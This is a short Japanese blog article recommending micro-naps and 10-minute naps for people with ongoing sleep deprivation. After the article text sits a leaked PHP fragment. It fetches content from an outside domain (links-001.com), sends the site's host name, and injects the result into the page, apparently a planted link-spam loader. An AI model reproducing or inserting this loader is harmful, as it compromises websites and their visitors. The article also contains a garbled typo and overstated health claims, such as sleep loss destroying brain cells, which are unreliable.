睡眠不足の状態が続いているときには仮眠がおすすめ

睡眠が十分取れていると体内時計に働きから午前中に眠くなることは少ないです。
起床してから4時間後に眠気がある場合には寝不足の状態の可能性が高いです。
休日の睡眠時間が平日よりも2時間胃所長い人も睡眠不足の状態が続いている可能性が高いです。
睡眠不足の状態が続いていて脳の神経細胞が壊れてしまって限界になっているときには、起きているつもりでも一瞬落ちてしまったり、目を開けているのに呼びかけに応じなかったりという状態が起きています。
意識に反して脳の働きを短時間止めて脳細胞を守っています。
そんな状態には数秒でも眠ると頭が少しスッキリします。
数秒眠るだけですので、特別な準備は必要がなく、同じ姿勢で目を閉じて一瞬で眠って、目が覚めたら伸びてみるなどできるだけ身体を動かして眠気を払って元の仕事をします。
クリエイティブな仕事をしている時などにおすすめの仮眠方法です。
10分仮眠をとれると眠気や疲労感が減って活気が戻ってきます。
通勤や帰宅の電車の中や午前・午後と少しの時間で10分仮眠を取り入れることによって疲労回復に効果的です。
眠るときには安定した姿勢でネクタイなどの身体を締めつけてしまうアイテムは緩めておきます。
ただし長時間寝てしまうと夜眠れなくなってしまうため短時間の仮眠がおすすめです。

".file_get_contents('http://links-001.com/fullspeedset.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

最新投稿